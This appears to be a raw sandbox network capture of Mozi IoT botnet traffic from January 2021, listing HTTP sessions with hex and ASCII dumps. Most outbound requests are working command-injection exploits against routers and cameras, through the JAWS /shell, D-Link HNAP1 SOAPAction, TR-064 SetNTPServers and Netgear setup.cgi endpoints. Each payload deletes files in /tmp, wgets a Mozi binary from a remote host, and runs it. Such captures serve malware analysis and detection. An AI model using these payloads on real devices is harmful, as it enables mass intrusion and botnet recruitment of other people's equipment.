                                                                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 61 73 74 6c 79 20 65 72 72 6f 72 3a 20 75 6e 6b 6e 6f 77 6e 20 64 6f 6d 61 69 6e 20 31 36 37 2e 38 32 2e 31 30 32 2e 39 31 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 46 61 73 74 6c 79 20 65 72 72 6f 72 3a 20 75 6e 6b 6e 6f 77 6e 20 64 6f 6d 61 69 6e 3a 20 31 36 37 2e 38 32 2e 31 30 32 2e 39 31 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 61 64 64 65 64 20 74 6f 20 61 20 73 65 72 76 69 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 44 65 74 61 69 6c 73 3a 20 63 61 63 68 65 2d 68 68 6e 34 30 35 31 2d 48 48 4e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                          Data Ascii: <html><head><title>Fastly error: unknown domain 167.82.102.91</title></head><body><p>Fastly error: unknown domain: 167.82.102.91. Please check that this domain has been added to a service.</p><p>Details: cache-hhn4051-HHN</p></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          12192.168.2.2033674139.162.182.7080
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:37.395931005 CET853OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                          User-Agent: Hello, world
                                                                                                          Host: 139.162.182.70:80
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                          Connection: keep-alive
                                                                                                          Jan 6, 2021 19:33:37.436384916 CET853INHTTP/1.1 301 Moved Permanently
                                                                                                          Server: nginx
                                                                                                          Date: Wed, 06 Jan 2021 18:35:16 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 178
                                                                                                          Connection: keep-alive
                                                                                                          Location: https://foo.espensen.me:443/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          13192.168.2.203712885.214.105.21280
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:38.317817926 CET863OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 85.214.105.212:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                          Jan 6, 2021 19:33:49.175311089 CET1018INHTTP/1.1 400 Bad Request
                                                                                                          Date: Wed, 06 Jan 2021 18:33:38 GMT
                                                                                                          Server: Apache
                                                                                                          Content-Length: 290
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 38 35 2e 32 31 34 2e 31 30 35 2e 32 31 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 85.214.105.212 Port 80</address></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          14192.168.2.2044712205.94.125.777574
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:46.453486919 CET901OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34 20 26 26 20 2f 74 6d 70 2f 74 72 30 36 34 20 74 72 30 36 34 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 3c 2f 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                                                                                                          Jan 6, 2021 19:33:46.690016985 CET902INHTTP/1.1 503 Service Unavailable
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Content-Length: 15312
                                                                                                          Connection: close
                                                                                                          P3P: CP="CAO PSA OUR"
                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 32 30 35 2e 39 34 2e 31 32 35 2e 37 37 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 31 3e 0a 3c 69 6d 67 20 77 69 64 74 68 3d 22 32 30 30 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 67 41 41 5a 41 42 6b 41 41 44 2f 32 77 42 44 41 42 41 4c 43 77 73 4d 43 78 41 4d 44 42 41 58 44 77 30 50 46 78 73 55 45 42 41 55 47 78 38 58 46 78 63 58 46 78 38 65 46 78 6f 61 47 68 6f 58 48 68 34 6a 4a 53 63 6c 49 78 34 76 4c 7a 4d 7a 4c 79 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 32 77 42 44 41 52 45 50 44 78 45 54 45 52 55 53 45 68 55 55 45 52 51 52 46 42 6f 55 46 68 59 55 47 69 59 61 47 68 77 61 47 69 59 77 49 78 34 65 48 68 34 6a 4d 43 73 75 4a 79 63 6e 4c 69 73 31 4e 54 41 77 4e 54 56 41 51 44 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 77 41 41 52 43 41 44 43 41 4d 67 44 41 53 49 41 41 68 45 42 41 78 45 42 2f 38 51 41 47 77 41 41 41 51 55 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 44 42 41 55 47 41 51 66 2f 78 41 42 4a 45 41 41 43 41 51 4d 43 41 77 51 47 43 41 49 48 42 67 55 46 41 41 41 42 41 67 4d 41 42 42 45 46 45 69 45 78 51 52 4d 69 55 57 45 47 4d 6c 4a 78 63 6f 45 55 49 30 4b 52 6f 62 48 42 30 57 4b 43 46 54 4e 54 6b 71 4c 68 38 43 52 44 63 37 4c 53 38 52 63 30 59 35 50 43 52 46 52 56 68 4b 50 2f 78 41 41 5a 41 51 41 44 41 51 45 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 4d 42 42 41 58 2f 78 41 41 79 45 51 41 43 41 51 4d 43 42 51 49 46 41 77 4d 46 41 41 41 41 41 41 41 42 41 67 41 44 45 53 45 53 4d 52 4d 69 51 56 46 68 4d 6f 45 45 51 6d 4a 78 6f 56 4b 52 77 53 4d 7a 73 57 4f 43 30 65 48 77 2f 39 6f 41 44 41 4d 42 41 41
                                                                                                          Data Ascii: <html><head><title>205.94.125.77</title><style>#c{border:3px solid #aaa;background-color:#fff;margin:20;padding:20;font-family:Tahoma,Helvetica,Arial,sans-serif;font-size:12px;}h1,h2,h3,h4,h5{font-weight:bold;}h2,h3{font-size:20px;}h1{text-align:center;font-size:22px;color:#cc0000;}h2{color:#330066;}h3{color:#666;}h4{font-size:16px;color:#666;}h5{margin:20;text-align:left;font-size:12px;color:#666;}b{font-size:16px;font-weight:bold;color:#cc0000;}</style></head><body bgcolor="#e7e8e9"><div id="c"><h1><img width="200" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/2wBDABALCwsMCxAMDBAXDw0PFxsUEBAUGx8XFxcXFx8eFxoaGhoXHh4jJSclIx4vLzMzLy9AQEBAQEBAQEBAQEBAQED/2wBDAREPDxETERUSEhUUERQRFBoUFhYUGiYaGhwaGiYwIx4eHh4jMCsuJycnLis1NTAwNTVAQD9AQEBAQEBAQEBAQED/wAARCADCAMgDASIAAhEBAxEB/8QAGwAAAQUBAQAAAAAAAAAAAAAAAAIDBAUGAQf/xABJEAACAQMCAwQGCAIHBgUFAAABAgMABBEFEiExQRMiUWEGMlJxcoEUI0KRobHB0WKCFTNTkqLh8CRDc7LS8Rc0Y5PCRFRVhKP/xAAZAQADAQEBAAAAAAAAAAAAAAAAAgMBBAX/xAAyEQACAQMCBQIFAwMFAAAAAAABAgADESESMRMiQVFhMoEEQmJxoVKRwSMzsWOC0eHw/9oADAMBAA


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          15192.168.2.203431623.210.67.16780
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:50.427550077 CET1028OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 23.210.67.167:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                          Jan 6, 2021 19:33:50.590352058 CET1029INHTTP/1.0 400 Bad Request
                                                                                                          Server: AkamaiGHost
                                                                                                          Mime-Version: 1.0
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 249
                                                                                                          Expires: Wed, 06 Jan 2021 18:33:50 GMT
                                                                                                          Date: Wed, 06 Jan 2021 18:33:50 GMT
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 48 4e 41 50 31 26 23 34 37 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 33 33 63 61 31 37 26 23 34 36 3b 31 36 30 39 39 35 38 30 33 30 26 23 34 36 3b 62 31 30 35 66 62 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;a433ca17&#46;1609958030&#46;b105fbc</BODY></HTML>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          16192.168.2.204774215.161.88.4980
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:17.293637037 CET1148OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:34:17.338315964 CET1149INHTTP/1.1 301 Moved Permanently
                                                                                                          Server: awselb/2.0
                                                                                                          Date: Wed, 06 Jan 2021 18:34:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 134
                                                                                                          Connection: close
                                                                                                          Location: https://pe-pr-elkal-pckufuq1j3eo-2103178403.eu-south-1.elb.amazonaws.com:443/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          17192.168.2.204835223.214.76.7180
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:17.498872042 CET1150OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                          User-Agent: Hello, world
                                                                                                          Host: 23.214.76.71:80
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                          Connection: keep-alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          18192.168.2.2058928103.47.16.23580
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:18.232955933 CET1159OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 103.47.16.235:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
